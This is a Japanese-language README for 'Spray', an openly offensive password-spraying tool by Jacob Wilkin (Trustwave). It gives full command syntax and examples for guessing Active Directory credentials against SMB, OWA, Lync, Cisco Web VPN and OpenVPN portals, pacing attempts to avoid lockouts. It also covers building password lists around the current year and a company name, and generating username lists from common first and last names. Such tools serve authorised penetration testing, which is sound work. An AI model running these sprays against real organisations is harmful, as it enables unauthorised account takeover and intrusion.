
Jacob Wilkin(Greenwolf)によるActive Directory認証情報のパスワードスプレーツール
Jacob Wilkin (Greenwolf) による Active Directory 認証情報のパスワードスプレー攻撃ツール
この指示では、Spray を使用するための要件と方法を説明します。
すべての要件は Kali Linux にプリインストールされています。他のディストリビューションや Mac で実行する場合は、apt-get または brew を使用して curl(OWA および Lync 用)と rpcclient(SMB 用)がインストールされていることを確認してください。(rpcclient は macOS では利用できないため、smb スプレーは機能しません。)
rpcclient
curl
このスクリプトは、一定期間にわたってターゲットに対してパスワードスプレーを実行します。アカウントがロックアウトされないように、パスワードポリシーを入力として必要とします。
このスクリプトには、複数の言語向けに手作業で作成された一連のパスワードファイルが付属しています。これらは、さまざまな言語で最も一般的な Active Directory パスワードから作成されており、すべて複雑(大文字1文字、小文字1文字、数字1文字)のカテゴリに適合します。
SMB ポータルに対してパスワードスプレーを実行するには、ユーザーリスト、パスワードリスト、ロックアウト期間あたりの試行回数、ロックアウト期間の長さ、およびドメインを指定する必要があります。
Useage: spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
Example: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 SPIDERLABS
Optionally Skip Username%Username Spray: spray.sh -smb 192.168.0.1 users.txt passwords.txt 1 35 SPIDERLABS skipuu
OWA ポータルに対してパスワードスプレーを実行するには、ユーザー名: [email protected]、パスワード: spraypassword を含む POST リクエストのファイルを作成する必要があります。
Useage: spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>
Example: spray.sh -owa 192.168.0.1 users.txt passwords.txt 1 35 post-request.txt
Lync サービスに対してパスワードスプレーを実行するには、Lync 自動検出 URL または www-authenticate ヘッダーを返す URL と、電子メールアドレスのリストを指定する必要があります。
Useage: spray.sh -lync <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
Example: spray.sh -lync https://lyncdiscover.spiderlabs.com/ users.txt passwords.txt 1 35
Example: spray.sh -lync https://lyncweb.spiderlabs.com/Autodiscover/AutodiscoverService.svc/root/oauth/user users.txt passwords.txt 1 35
CISCO Web VPN サービスに対してパスワードスプレーを実行するには、ターゲットポータルまたはポータルをホストするサーバーを指定する必要があります。
Useage: spray.sh -cisco <targetURL> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
Example: spray.sh -cisco 192.168.0.1 usernames.txt passwords.txt 1 35
OpenVPN Web ポータルに対してパスワードスプレーを実行するには、ターゲット IP アドレスとポートを指定する必要があります。
Useage: spray.sh -ovpn <targetIP> <targetPort> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
Example: spray.sh -ovpn 192.168.0.1 943 usernames.txt passwords.txt 1 35
提供された 2016/2017 パスワードリストを現在の年に更新することも可能です。
Useage: spray.sh -passupdate <passwordList>
Example: spray.sh -passupdate passwords.txt
会社名をオプションで指定してリストに追加することもできます。
Useage: spray.sh -passupdate <passwordList> <CompanyName>
Example: spray.sh -passupdate passwords.txt Spiderlabs
一般的な名前のリストからユーザー名リストを生成することもできます。
Useage: spray.sh -genusers <firstnames> <lastnames> "<<fi><li><fn><ln>>"
Example: spray.sh -genusers english-first-1000.txt english-last-1000.txt "<fi><ln>"
Example: spray.sh -genusers english-first-1000.txt english-last-1000.txt "<fn>.<ln>"
このツールが役に立ったなら、コーヒーを一杯おごって感謝の気持ちを示してください :)
Spray Jacob Wilkin 作成 Copyright (C) 2017 Trustwave Holdings, Inc.
このプログラムはフリーソフトウェアです。あなたは、Free Software Foundation によって発行された GNU 一般公衆ライセンスのバージョン3、または(あなたの選択により)それ以降のバージョンの条件下で、それを再配布および/または変更することができます。
このプログラムは有用であることを願って配布されていますが、いかなる保証もありません。商品性または特定目的への適合性の黙示の保証も含め、一切の保証はありません。詳細については、GNU 一般公衆ライセンスをご覧ください。